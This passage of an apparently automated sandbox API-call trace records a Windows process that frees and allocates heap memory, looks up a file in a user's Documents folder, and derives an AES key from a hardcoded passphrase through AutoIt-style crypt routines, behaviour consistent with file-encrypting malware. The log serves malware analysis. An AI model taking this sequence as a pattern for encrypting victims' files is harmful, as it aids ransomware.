lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.034] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0080.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.035] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.036] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.036] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0080.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caaa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.038] CloseHandle (hObject=0x258) returned 1 [0080.038] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.038] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.038] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d566e80, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0x1927e6d0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0x1927e6d0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="lTD44h.ots", cAlternateFileName="")) returned 0x41ac200 [0080.039] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0080.039] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.039] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0080.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0080.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0080.039] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a48c0) returned 1 [0080.040] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0080.040] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.040] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0080.055] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0080.055] CryptCreateHash (in: hProv=0x41a48c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0080.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.055] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0080.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb378, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0080.056] CryptHashData (hHash=0x41ac200, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0080.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb120, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0080.056] CryptDeriveKey (in: hProv=0x41a48c0, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac440) returned 1 [0080.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0080.056] CryptDestroyHash (hHash=0x41ac200) returned 1 [0080.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0080.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.057] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0080.057] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.057] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 